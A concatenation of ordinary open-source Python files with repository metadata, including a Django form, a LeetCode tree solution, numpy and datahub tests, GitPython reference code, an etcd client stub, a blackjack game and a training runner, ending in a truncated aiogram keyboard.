Python
| false
| false
| 1,237
|
py
|
from django import forms
from django.core.validators import validate_email
from .models import contact_details
# Form for accepting new interviews
class InterviewRequestForm(forms.ModelForm):
class Meta:
model = contact_details
fields = [
'contact_form',
'contact',
]
def clean_contact(self):
this_contact = self.cleaned_data.get('contact')
this_contact_form = self.cleaned_data.get('contact_form')
if this_contact_form == 'email':
try:
validate_email(this_contact)
except forms.ValidationError:
raise forms.ValidationError("Please enter a Valid Email address")
existing_contact = contact_details.objects.filter(contact=this_contact, contact_form=this_contact_form)
if existing_contact:
raise forms.ValidationError("You already submitted a request with these credentials")
else:
return this_contact
def __init__(self, *args , **kwargs):
super(InterviewRequestForm, self).__init__(*args, **kwargs)
self.fields["contact_form"].help_text = "Select a social media to get in contact with you, example: Twitter, or an email"
self.fields["contact"].help_text = "Enter your User ID or e-mail"
self.fields["contact"].label = "User ID"
self.fields["contact_form"].label = "Platform"
|
[
"salikhundmiri@gmail.com"
] |
salikhundmiri@gmail.com
|
915041a61b6a71d83948b1377ec6af9eacdb1a07
|
89213af925471c5954a12d0fe5bb47dfd988c351
|
/tree/0199_right_side_view_BT.py
|
b9c870d5a7eb7f463f9325d660bcbb7aa25e8deb
|
[] |
no_license
|
seanchen513/leetcode
|
be554dd668221b6d03c598090d6684165bc512c5
|
4723a64b00502c824bb9b848a1737478096aa3e1
|
refs/heads/master
| 2021-11-10T11:50:16.674255
| 2021-11-10T02:57:02
| 2021-11-10T02:57:02
| 237,393,266
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,972
|
py
|
"""
199. Binary Tree Right Side View
Medium
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
Example:
Input: [1,2,3,null,5,null,4]
Output: [1, 3, 4]
Explanation:
1 <---
/ \
2 3 <---
\ \
5 4 <---
"""
#import sys
#sys.path.insert(1, '../tree/')
from binary_tree import TreeNode, print_tree, array_to_bt_lc
from typing import List
###############################################################################
"""
Solution 1: BFS and take last element of each level.
O(n) time
O(n) extra space (due to last level)
O(h) space for output
"""
class Solution:
def rightSideView(self, root: TreeNode) -> List[int]:
if not root:
return []
view = []
level = [root]
while level:
view += [level[-1].val]
next_level = []
for node in level:
if node.left:
next_level.append(node.left)
if node.right:
next_level.append(node.right)
level = next_level
return view
###############################################################################
"""
Solution 2: modified postorder traversal (LRP, left-right-parent).
For each level, the rightmost element is visited first.
O(n) time
O(h) space for recursion stack
O(h) space for dict and output
"""
class Solution2:
def rightSideView(self, root: TreeNode) -> List[int]:
def dfs(node, depth=0):
if not node:
return
dfs(node.right, depth + 1)
dfs(node.left, depth + 1)
if depth not in view:
view[depth] = node.val
view = {}
dfs(root)
return [view[d] for d in range(len(view))]
###############################################################################
if __name__ == "__main__":
def test(arr, comment=None):
root = array_to_bt_lc(arr)
solutions = [Solution(), Solution2()]
res = [s.rightSideView(root) for s in solutions]
print("="*80)
if comment:
print(comment, "\n")
print(arr, "\n")
print_tree(root)
print(f"\nSolutions: {res}")
comment = "Tree w/ depth 1"
arr = [1]
test(arr, comment)
comment = "Tree w/ depth 2"
arr = [1, 2,3]
test(arr, comment)
comment = "Tree w/ depth 3"
arr = [1, 2,3, 4,5,6,7]
test(arr, comment)
comment = ""
arr = [1,None,3,None,7]
test(arr, comment)
comment = ""
arr = [1,2,None,4]
test(arr, comment)
comment = ""
arr = [1, 2,3, 4,None,None,7, 8,None,None,15]
test(arr, comment)
comment = "LC example 1; answer = [1, 3, 4]"
arr = [1, 2,3, None,5,None,4]
test(arr, comment)
|
[
"seanchen513@gmail.com"
] |
seanchen513@gmail.com
|
d8c4edc6e935f0f2cb02543ebdf08f69695c523c
|
d77a0d5a18af141d36005eba1769f7384f5ce1d4
|
/mDataAn_venv/Lib/site-packages/numpy/testing/tests/test_decorators.py
|
69c1c9ad4a3558ad02edf36dd0e0855c6e0df6d9
|
[] |
no_license
|
LukasPolon/MData
|
32d756d0df8c8847cf45b8def6e5ef760963d895
|
2178a0b2f60c4c638fd696a6e11b0ef801724bf4
|
refs/heads/master
| 2022-12-11T15:02:07.528855
| 2018-01-07T16:22:58
| 2018-01-07T16:22:58
| 99,687,079
| 1
| 0
| null | 2021-06-01T22:04:39
| 2017-08-08T11:51:11
|
Python
|
UTF-8
|
Python
| false
| false
| 4,493
|
py
|
from __future__ import division, absolute_import, print_function
import warnings
from numpy.testing import (dec, assert_, assert_raises, run_module_suite,
SkipTest, KnownFailureException)
def test_slow():
@dec.slow
def slow_func(x, y, z):
pass
assert_(slow_func.slow)
def test_setastest():
@dec.setastest()
def f_default(a):
pass
@dec.setastest(True)
def f_istest(a):
pass
@dec.setastest(False)
def f_isnottest(a):
pass
assert_(f_default.__test__)
assert_(f_istest.__test__)
assert_(not f_isnottest.__test__)
class DidntSkipException(Exception):
pass
def test_skip_functions_hardcoded():
@dec.skipif(True)
def f1(x):
raise DidntSkipException
try:
f1('a')
except DidntSkipException:
raise Exception('Failed to skip')
except SkipTest:
pass
@dec.skipif(False)
def f2(x):
raise DidntSkipException
try:
f2('a')
except DidntSkipException:
pass
except SkipTest:
raise Exception('Skipped when not expected to')
def test_skip_functions_callable():
def skip_tester():
return skip_flag == 'skip me!'
@dec.skipif(skip_tester)
def f1(x):
raise DidntSkipException
try:
skip_flag = 'skip me!'
f1('a')
except DidntSkipException:
raise Exception('Failed to skip')
except SkipTest:
pass
@dec.skipif(skip_tester)
def f2(x):
raise DidntSkipException
try:
skip_flag = 'five is right out!'
f2('a')
except DidntSkipException:
pass
except SkipTest:
raise Exception('Skipped when not expected to')
def test_skip_generators_hardcoded():
@dec.knownfailureif(True, "This test is known to fail")
def g1(x):
for i in range(x):
yield i
try:
for j in g1(10):
pass
except KnownFailureException:
pass
else:
raise Exception('Failed to mark as known failure')
@dec.knownfailureif(False, "This test is NOT known to fail")
def g2(x):
for i in range(x):
yield i
raise DidntSkipException('FAIL')
try:
for j in g2(10):
pass
except KnownFailureException:
raise Exception('Marked incorrectly as known failure')
except DidntSkipException:
pass
def test_skip_generators_callable():
def skip_tester():
return skip_flag == 'skip me!'
@dec.knownfailureif(skip_tester, "This test is known to fail")
def g1(x):
for i in range(x):
yield i
try:
skip_flag = 'skip me!'
for j in g1(10):
pass
except KnownFailureException:
pass
else:
raise Exception('Failed to mark as known failure')
@dec.knownfailureif(skip_tester, "This test is NOT known to fail")
def g2(x):
for i in range(x):
yield i
raise DidntSkipException('FAIL')
try:
skip_flag = 'do not skip'
for j in g2(10):
pass
except KnownFailureException:
raise Exception('Marked incorrectly as known failure')
except DidntSkipException:
pass
def test_deprecated():
@dec.deprecated(True)
def non_deprecated_func():
pass
@dec.deprecated()
def deprecated_func():
import warnings
warnings.warn("TEST: deprecated func", DeprecationWarning)
@dec.deprecated()
def deprecated_func2():
import warnings
warnings.warn("AHHHH")
raise ValueError
@dec.deprecated()
def deprecated_func3():
import warnings
warnings.warn("AHHHH")
# marked as deprecated, but does not raise DeprecationWarning
assert_raises(AssertionError, non_deprecated_func)
# should be silent
deprecated_func()
with warnings.catch_warnings(record=True):
warnings.simplefilter("always") # do not propagate unrelated warnings
# fails if deprecated decorator just disables test. See #1453.
assert_raises(ValueError, deprecated_func2)
# warning is not a DeprecationWarning
assert_raises(AssertionError, deprecated_func3)
if __name__ == '__main__':
run_module_suite()
|
[
"lukaspolon@gmail.com"
] |
lukaspolon@gmail.com
|
430153ab989c70328c2d747dca69ee952a2d761e
|
03ae0dee75698f5012d80b218e71500181cd3e68
|
/cd2h_repo_project/utils.py
|
62197a6d92d58546d86f4a14193d1f23d3f6e3fb
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
galterlibrary/InvenioRDM-at-NU
|
0b5e5043f67d0dc12960c00617ad2b7e14f4f6e8
|
5aff6ac7c428c9a61bdf221627bfc05f2280d1a3
|
refs/heads/master
| 2020-03-20T14:45:50.950239
| 2019-09-26T19:14:45
| 2019-09-26T19:14:45
| 137,494,704
| 6
| 0
|
MIT
| 2019-09-26T19:14:47
| 2018-06-15T14:06:06
|
Python
|
UTF-8
|
Python
| false
| false
| 630
|
py
|
"""General utility functions for any module."""
from flask_principal import AnonymousIdentity, Identity, RoleNeed, UserNeed
def get_identity(user):
"""Returns the identity for a given user instance.
This is needed because we are more explicit then Flask-Principal
and it is MUCH more convenient for tests.
"""
if hasattr(user, 'id'):
identity = Identity(user.id)
identity.provides.add(UserNeed(user.id))
else:
return AnonymousIdentity()
for role in getattr(user, 'roles', []):
identity.provides.add(RoleNeed(role.name))
identity.user = user
return identity
|
[
"fenekku@fenekku.com"
] |
fenekku@fenekku.com
|
457faf21e9fc6f3d361e17dc6880d7510c0822b5
|
2d0bada349646b801a69c542407279cc7bc25013
|
/src/vai_optimizer/example/pruning/tensorflow_v1/resnet50_pruning.py
|
3f6b05b1cd1911eaf0f109cd895db49dffccf932
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-3-Clause-Open-MPI",
"LicenseRef-scancode-free-unknown",
"Libtool-exception",
"GCC-exception-3.1",
"LicenseRef-scancode-mit-old-style",
"OFL-1.1",
"JSON",
"LGPL-2.1-only",
"LGPL-2.0-or-later",
"ICU",
"LicenseRef-scancode-other-permissive",
"GPL-2.0-or-later",
"GPL-3.0-only",
"LicenseRef-scancode-issl-2018",
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-unicode",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-3.0-or-later",
"Zlib",
"BSD-Source-Code",
"ClArtistic",
"LicenseRef-scancode-unknown-license-reference",
"ISC",
"NCSA",
"LicenseRef-scancode-proprietary-license",
"GPL-2.0-only",
"CC-BY-4.0",
"FSFULLR",
"Minpack",
"Unlicense",
"BSL-1.0",
"NAIST-2003",
"LicenseRef-scancode-protobuf",
"LicenseRef-scancode-public-domain",
"Libpng",
"Spencer-94",
"BSD-2-Clause",
"Intel",
"GPL-1.0-or-later",
"MPL-2.0"
] |
permissive
|
Xilinx/Vitis-AI
|
31e664f7adff0958bb7d149883ab9c231efb3541
|
f74ddc6ed086ba949b791626638717e21505dba2
|
refs/heads/master
| 2023-08-31T02:44:51.029166
| 2023-07-27T06:50:28
| 2023-07-27T06:50:28
| 215,649,623
| 1,283
| 683
|
Apache-2.0
| 2023-08-17T09:24:55
| 2019-10-16T21:41:54
|
Python
|
UTF-8
|
Python
| false
| false
| 2,145
|
py
|
# MIT License
#
# Copyright (c) 2023 Advanced Micro Devices, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from tf1_nndct.optimization.pruning import IterativePruningRunner
import tensorflow as tf
import numpy as np
from nets.resnet_v2 import resnet_v2_50
def eval_fn(frozen_graph_def: tf.compat.v1.GraphDef) -> float:
with tf.compat.v1.Session().as_default() as sess:
return 0.5
def main():
with tf.compat.v1.Session() as sess:
opt = tf.compat.v1.train.GradientDescentOptimizer(learning_rate=0.1)
images = tf.convert_to_tensor(np.ones((1, 224, 224, 3), dtype=np.float32))
net, _ = resnet_v2_50(images, 1000)
print(net)
loss = tf.reduce_sum(net)
sess.run(tf.global_variables_initializer())
pruner = IterativePruningRunner("resnet50", sess, {}, ["resnet_v2_50/SpatialSqueeze"])
pruner.ana(eval_fn, gpu_ids=['/GPU:0', '/GPU:1'])
shape_tensors, masks = pruner.prune(sparsity=0.5)
variables = tf.trainable_variables()
sess.run(opt.minimize(loss, var_list=variables))
slim_graph_def = pruner.get_slim_graph_def(shape_tensors, masks)
if __name__ == "__main__":
main()
|
[
"do-not-reply@gitenterprise.xilinx.com"
] |
do-not-reply@gitenterprise.xilinx.com
|
17329d67a9eef61295267530f6d4eed9da6ec6a4
|
a63d907ad63ba6705420a6fb2788196d1bd3763c
|
/src/api/datahub/access/tests/modules/collector/no_factory_test.py
|
7cb318fa5707ad99aaceecb1edeccc1dd7dd0110
|
[
"MIT"
] |
permissive
|
Tencent/bk-base
|
a38461072811667dc2880a13a5232004fe771a4b
|
6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2
|
refs/heads/master
| 2022-07-30T04:24:53.370661
| 2022-04-02T10:30:55
| 2022-04-02T10:30:55
| 381,257,882
| 101
| 51
|
NOASSERTION
| 2022-04-02T10:30:56
| 2021-06-29T06:10:01
|
Python
|
UTF-8
|
Python
| false
| false
| 3,992
|
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import
import httpretty
import pytest
from datahub.access.collectors.base_collector import BaseAccessTask
from datahub.access.tests.fixture import conftest
from datahub.access.tests.fixture.access import * # noqa
from datahub.access.tests.utils import post
param = {
"bk_app_code": "bk_dataweb",
"bk_username": "admin",
"data_scenario": "unknow",
"bk_biz_id": 591,
"description": "xx",
"access_raw_data": {
"raw_data_name": "log_new_00011",
"maintainer": "xxxx",
"raw_data_alias": "asdfsaf",
"data_source": "svr",
"data_encoding": "UTF-8",
"sensitivity": "private",
"description": "xx",
},
"access_conf_info": {
"collection_model": {"collection_type": "incr", "start_at": 1, "period": 0},
"filters": {
"delimiter": "|",
"fields": [{"index": 1, "op": "=", "logic_op": "and", "value": "111"}],
},
"resource": {
"scope": [
{
"module_scope": [{"bk_obj_id": "set", "bk_inst_id": 123}],
"host_scope": [{"bk_cloud_id": 1, "ip": "x.x.x.x"}],
"scope_config": {
"paths": [
{
"path": ["/tmp/*.log", "/tmp/*.l", "/tmp/*.aaaz"],
"system": "linux",
}
]
},
}
]
},
},
}
@pytest.mark.django_db
def test_error_factory_deploy_plan():
httpretty.enable()
httpretty.reset()
conftest.mock_user_perm("admin")
conftest.mock_app_perm("bk_dataweb")
conftest.mock_create_data_id()
conftest.mock_get_data_id("unknow")
conftest.mock_collector_hub_deploy_plan()
url = "/v3/access/deploy_plan/"
res = post(url, param)
assert not res["result"]
assert res["code"] == "1577209"
@pytest.mark.django_db
def test_error_factory_deploy():
httpretty.enable()
httpretty.reset()
conftest.mock_user_perm("admin")
conftest.mock_app_perm("bk_dataweb")
url = "/v3/access/collector/unknow/deploy/"
res = post(url, param)
assert not res["result"]
assert res["code"] == "1577209"
@pytest.mark.usefixtures("init_task_log")
@pytest.mark.django_db
def test_task_log():
conftest.mock_user_perm("admin")
conftest.mock_app_perm("bk_dataweb")
task = BaseAccessTask(task_id=100)
task.log("test debug", level="debug", task_log=False, time=None)
|
[
"terrencehan@tencent.com"
] |
terrencehan@tencent.com
|
ff370d8533a9be416e4441f7a342c23059b406b2
|
973713f993166b1d0c2063f6e84361f05803886d
|
/Day01-15/09_exercise_8.py
|
bcd5d38fd6e777cae500b75373d3bdd0c6b4c445
|
[
"MIT"
] |
permissive
|
MaoningGuan/Python-100-Days
|
20ad669bcc0876b5adfbf2c09b4d25fd4691061a
|
d36e49d67a134278455438348efc41ffb28b778a
|
refs/heads/master
| 2022-11-17T12:24:45.436100
| 2020-07-18T02:24:42
| 2020-07-18T02:24:42
| 275,157,107
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,995
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
扑克游戏
"""
import random
class Card(object):
"""一张牌"""
def __init__(self, suite, face):
self._suite = suite
self._face = face
@property
def face(self):
return self._face
@property
def suite(self):
return self._suite
def __str__(self):
if self._face == 1:
face_str = 'A'
elif self._face == 11:
face_str = 'J'
elif self._face == 12:
face_str = 'Q'
elif self._face == 13:
face_str = 'K'
else:
face_str = str(self._face)
return '%s%s' % (self._suite, face_str)
def __repr__(self):
return self.__str__()
class Poker(object):
"""一副牌"""
def __init__(self):
self._cards = [Card(suite, face)
for suite in '♠♥♣♦'
for face in range(1, 14)]
self._current = 0
@property
def cards(self):
return self._cards
def shuffle(self):
"""洗牌(随机乱序"""
self._current = 0
random.shuffle(self._cards) # 将序列元素随机排序
@property
def next(self):
"""发牌"""
card = self._cards[self._current]
self._current += 1
return card
@property
def has_next(self):
"""还有没有牌"""
return self._current < len(self._cards)
class Player(object):
"""玩家"""
def __init__(self, name):
self._name = name
self._cards_on_hand = []
@property
def name(self):
return self._name
@property
def cards_on_hand(self):
return self._cards_on_hand
def get(self, card):
"""摸牌"""
self._cards_on_hand.append(card)
def arrange(self, card_key):
"""玩家整理手上的牌"""
self._cards_on_hand.sort(key=card_key)
# 排序规则-先根据花色再根据点数排序
def get_key(card):
return (card.suite, card.face)
def main():
p = Poker()
p.shuffle()
players = [Player('东邪'), Player('西毒'), Player('南帝'), Player('北丐')]
game_name = '21点'
cards_number = 2
for _ in range(cards_number):
for player in players:
player.get(p.next)
print(game_name + ':')
cards_number = []
for player in players:
print(player.name + ':', end=' ')
player.arrange(get_key)
print(player.cards_on_hand)
# 计算玩家的点数
pokers_sum = 0
cards = player.cards_on_hand
card_0 = cards[0].face
card_1 = cards[1].face
if 1 not in [card_0, card_1]:
if card_0 in [11, 12, 13]:
card_0 = 10
if card_1 in [11, 12, 13]:
card_1 = 10
pokers_sum = card_0 + card_1
else:
if card_0 == 1 and card_1 == 1:
pokers_sum = 12
else:
if card_0 == 1:
if card_1 in [11, 12, 13]:
card_1 = 10
pokers_sum = card_0 + card_1
number = card_1 + 11
if pokers_sum < number <= 21:
pokers_sum = number
elif card_1 == 1:
if card_0 in [11, 12, 13]:
card_0 = 10
pokers_sum = card_0 + card_1
number = card_0 + 11
if pokers_sum < number <= 21:
pokers_sum = number
cards_number.append(pokers_sum)
print(cards_number)
max_card_num = 0
player = -1
for index, card_number in enumerate(cards_number):
if max_card_num < card_number <= 21:
max_card_num = card_number
player = players[index]
if max_card_num != 0:
print(f'赢家为{player.name},点数为{max_card_num}')
if __name__ == '__main__':
main()
|
[
"1812711281@qq.com"
] |
1812711281@qq.com
|
a60c7006ec0c959e30a9e86876873f261277a809
|
aa6e1dd07a71a73bc08574b76f9e57a3ce8c8286
|
/077.Test_BeeWare_windows/beeware-tutorial/beeware-venv/Lib/site-packages/git/refs/reference.py
|
aaa9b63fe7fa10fe82bb3632e3410b491b042f8e
|
[
"MIT"
] |
permissive
|
IvanaXu/PyTools
|
0aff5982f50bb300bfa950405192c78473b69537
|
358ae06eef418fde35f424909d4f13049ca9ec7b
|
refs/heads/master
| 2023-06-07T21:45:44.242363
| 2023-06-06T16:00:25
| 2023-06-06T16:00:25
| 163,940,845
| 60
| 8
|
MIT
| 2022-12-23T02:49:05
| 2019-01-03T07:54:16
|
Python
|
UTF-8
|
Python
| false
| false
| 4,408
|
py
|
from git.util import (
LazyMixin,
Iterable,
)
from .symbolic import SymbolicReference
__all__ = ["Reference"]
#{ Utilities
def require_remote_ref_path(func):
"""A decorator raising a TypeError if we are not a valid remote, based on the path"""
def wrapper(self, *args):
if not self.is_remote():
raise ValueError("ref path does not point to a remote reference: %s" % self.path)
return func(self, *args)
# END wrapper
wrapper.__name__ = func.__name__
return wrapper
#}END utilities
class Reference(SymbolicReference, LazyMixin, Iterable):
"""Represents a named reference to any object. Subclasses may apply restrictions though,
i.e. Heads can only point to commits."""
__slots__ = ()
_points_to_commits_only = False
_resolve_ref_on_create = True
_common_path_default = "refs"
def __init__(self, repo, path, check_path=True):
"""Initialize this instance
:param repo: Our parent repository
:param path:
Path relative to the .git/ directory pointing to the ref in question, i.e.
refs/heads/master
:param check_path: if False, you can provide any path. Otherwise the path must start with the
default path prefix of this type."""
if check_path and not path.startswith(self._common_path_default + '/'):
raise ValueError("Cannot instantiate %r from path %s" % (self.__class__.__name__, path))
super(Reference, self).__init__(repo, path)
def __str__(self):
return self.name
#{ Interface
def set_object(self, object, logmsg=None): # @ReservedAssignment
"""Special version which checks if the head-log needs an update as well
:return: self"""
oldbinsha = None
if logmsg is not None:
head = self.repo.head
if not head.is_detached and head.ref == self:
oldbinsha = self.commit.binsha
# END handle commit retrieval
# END handle message is set
super(Reference, self).set_object(object, logmsg)
if oldbinsha is not None:
# /* from refs.c in git-source
# * Special hack: If a branch is updated directly and HEAD
# * points to it (may happen on the remote side of a push
# * for example) then logically the HEAD reflog should be
# * updated too.
# * A generic solution implies reverse symref information,
# * but finding all symrefs pointing to the given branch
# * would be rather costly for this rare event (the direct
# * update of a branch) to be worth it. So let's cheat and
# * check with HEAD only which should cover 99% of all usage
# * scenarios (even 100% of the default ones).
# */
self.repo.head.log_append(oldbinsha, logmsg)
# END check if the head
return self
# NOTE: Don't have to overwrite properties as the will only work without a the log
@property
def name(self):
""":return: (shortest) Name of this reference - it may contain path components"""
# first two path tokens are can be removed as they are
# refs/heads or refs/tags or refs/remotes
tokens = self.path.split('/')
if len(tokens) < 3:
return self.path # could be refs/HEAD
return '/'.join(tokens[2:])
@classmethod
def iter_items(cls, repo, common_path=None):
"""Equivalent to SymbolicReference.iter_items, but will return non-detached
references as well."""
return cls._iter_items(repo, common_path)
#}END interface
#{ Remote Interface
@property
@require_remote_ref_path
def remote_name(self):
"""
:return:
Name of the remote we are a reference of, such as 'origin' for a reference
named 'origin/master'"""
tokens = self.path.split('/')
# /refs/remotes/<remote name>/<branch_name>
return tokens[2]
@property
@require_remote_ref_path
def remote_head(self):
""":return: Name of the remote head itself, i.e. master.
:note: The returned name is usually not qualified enough to uniquely identify
a branch"""
tokens = self.path.split('/')
return '/'.join(tokens[3:])
#} END remote interface
|
[
"1440420407@qq.com"
] |
1440420407@qq.com
|
bce5d26895cbbaa98ad04b69f939816ec032ddc7
|
7feebb0a6c7751ad2b1870efd63c85c2d8f670bb
|
/txaioetcd/_client_aio.py
|
6de2f28359bb6d9ba8c403a216e4fef45e309398
|
[
"MIT"
] |
permissive
|
om26er/txaio-etcd
|
edbcfe65ac19c8f4326944f0b0bcae986e7aa3fe
|
0ed71ba01ab13acebf874ddf650f880bb1e676a5
|
refs/heads/master
| 2021-01-02T23:36:01.330887
| 2017-09-14T18:28:21
| 2017-09-14T18:28:21
| 99,502,890
| 0
| 0
| null | 2017-08-06T17:36:17
| 2017-08-06T17:36:17
| null |
UTF-8
|
Python
| false
| false
| 2,579
|
py
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
__all__ = (
'Client',
)
class _None(object):
pass
class Client(object):
"""
etcd asyncio client that talks to the gRPC HTTP gateway endpoint of etcd v3.
See: https://coreos.com/etcd/docs/latest/dev-guide/apispec/swagger/rpc.swagger.json
"""
def __init__(self, loop, url):
pass
def status(self):
raise Exception('not implemented')
def set(self, key, value, lease=None, return_previous=None):
raise Exception('not implemented')
def get(self,
key,
count_only=None,
keys_only=None,
limit=None,
max_create_revision=None,
min_create_revision=None,
min_mod_revision=None,
revision=None,
serializable=None,
sort_order=None,
sort_target=None):
raise Exception('not implemented')
def delete(self, key, return_previous=None):
raise Exception('not implemented')
def watch(self, keys, on_watch, start_revision=None):
raise Exception('not implemented')
def submit(self, txn):
raise Exception('not implemented')
def lease(self, time_to_live, lease_id=None):
raise Exception('not implemented')
|
[
"tobias.oberstein@tavendo.de"
] |
tobias.oberstein@tavendo.de
|
20803dc548bd9f4077e54216bfe95ec8e10adf13
|
d94b6845aeeb412aac6850b70e22628bc84d1d6d
|
/gfsa/training/simple_train.py
|
d352630a277e5c92d7087e72fc751cf46dc4ca7d
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
ishine/google-research
|
541aea114a68ced68736340e037fc0f8257d1ea2
|
c1ae273841592fce4c993bf35cdd0a6424e73da4
|
refs/heads/master
| 2023-06-08T23:02:25.502203
| 2023-05-31T01:00:56
| 2023-05-31T01:06:45
| 242,478,569
| 0
| 0
|
Apache-2.0
| 2020-06-23T01:55:11
| 2020-02-23T07:59:42
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,569
|
py
|
# coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple training runner."""
from absl import app
from absl import flags
import gin
from gfsa.training import simple_runner
flags.DEFINE_string("train_log_dir", None, "Path to log directory.")
flags.DEFINE_string("train_artifacts_dir", None,
"Path to save params and other artifacts.")
flags.DEFINE_multi_string("gin_files", [], "Gin config files to use.")
flags.DEFINE_multi_string("gin_include_dirs", [],
"Directories to search when resolving gin includes.")
flags.DEFINE_multi_string(
"gin_bindings", [],
"Gin bindings to override the values set in the config files.")
flags.DEFINE_enum("task", None, {"maze", "edge_supervision", "var_misuse"},
"Task to run.")
FLAGS = flags.FLAGS
def main(argv):
if len(argv) > 1:
raise app.UsageError("Too many command-line arguments.")
# pylint:disable=g-import-not-at-top
if FLAGS.task == "maze":
from gfsa.training import train_maze_lib
train_fn = train_maze_lib.train
elif FLAGS.task == "edge_supervision":
from gfsa.training import train_edge_supervision_lib
train_fn = train_edge_supervision_lib.train
elif FLAGS.task == "var_misuse":
from gfsa.training import train_var_misuse_lib
train_fn = train_var_misuse_lib.train
else:
raise ValueError(f"Unrecognized task {FLAGS.task}")
# pylint:enable=g-import-not-at-top
print("Setting up Gin configuration")
for include_dir in FLAGS.gin_include_dirs:
gin.add_config_file_search_path(include_dir)
gin.bind_parameter("simple_runner.training_loop.artifacts_dir",
FLAGS.train_artifacts_dir)
gin.bind_parameter("simple_runner.training_loop.log_dir", FLAGS.train_log_dir)
gin.parse_config_files_and_bindings(
FLAGS.gin_files,
FLAGS.gin_bindings,
finalize_config=False,
skip_unknown=False)
gin.finalize()
train_fn(runner=simple_runner)
if __name__ == "__main__":
app.run(main)
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
f86f0b7160e46973c357dad4d8d75a61687f58b3
|
ff413ecba8eb6a3f8afc225bd1339abac453202c
|
/project/admin_bot/keyboards/adding_products_to_package_kb.py
|
fb360b13d90fd94339878386bb1388ab12bda04c
|
[] |
no_license
|
Artvell/bot
|
561b614fde5d19335736ac390e35814afd6b6180
|
0b85a5efc4c302f522bf23a23fbbbc8a9efc7008
|
refs/heads/main
| 2023-08-10T17:10:21.500433
| 2021-09-11T12:54:32
| 2021-09-11T12:54:32
| 405,372,665
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 372
|
py
|
from aiogram.types import InlineKeyboardButton, InlineKeyboardMarkup
def adding_kb(package_id):
keyboard = InlineKeyboardMarkup()
keyboard.add(InlineKeyboardButton("Добавить",switch_inline_query_current_chat=""))
